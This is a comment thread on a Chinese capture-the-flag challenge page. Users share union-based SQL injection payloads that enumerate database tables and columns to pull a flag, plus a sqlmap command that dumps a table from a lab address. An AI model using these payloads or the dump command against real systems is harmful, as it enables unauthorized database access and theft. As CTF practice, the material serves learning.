评分(21)
解题动态
ctfgoer 攻破了该题 14分钟前
24030111073 攻破了该题 9小时前
admin11linyu 攻破了该题 13小时前
2573745604 攻破了该题 13小时前
3495825647 攻破了该题 13小时前
DURUI 攻破了该题 14小时前
handk 攻破了该题 1天前
asss 攻破了该题 1天前
yinyx 攻破了该题 1天前
Gyro 攻破了该题 2天前
AAxiao 攻破了该题 2天前
shai 攻破了该题 2天前
勇敢的黄金矿工 攻破了该题 2天前
liuzibo 攻破了该题 2天前
yixcjy 攻破了该题 2天前
zhiyin 攻破了该题 3天前
16651618785 攻破了该题 3天前
besty2k 攻破了该题 4天前
西北狼 攻破了该题 4天前
评论
不聪明小孩 9月前
举报
-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值
19818532957 5月前
举报
佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #
DrKeen 9月前
举报
hackbar有问题id=1'做不到,用burp搞了
SmallH 10月前
举报
是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???
.⎛⎝•̀ω•́⎠⎞. 10月前
举报
我用sqlmap做出来了
gboyd 10月前
举报
我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!
NPC 11月前
举报
环境绝对有问题,照着答案注入都无回显!!!退金币!
EtHat 1年前
举报
sqlmap一把梭哈
blackjack009 1年前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump
18946551925 1年前
举报
为什么一注入就连接已重置啊??????烦死了,差哪呢?
xiaohaisec 1年前
举报
1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa
n0pass 1年前
举报
启动环境以后网页打不开啊。。。。。。退钱
harry 管理员 1年前
举报
已修复,金币退了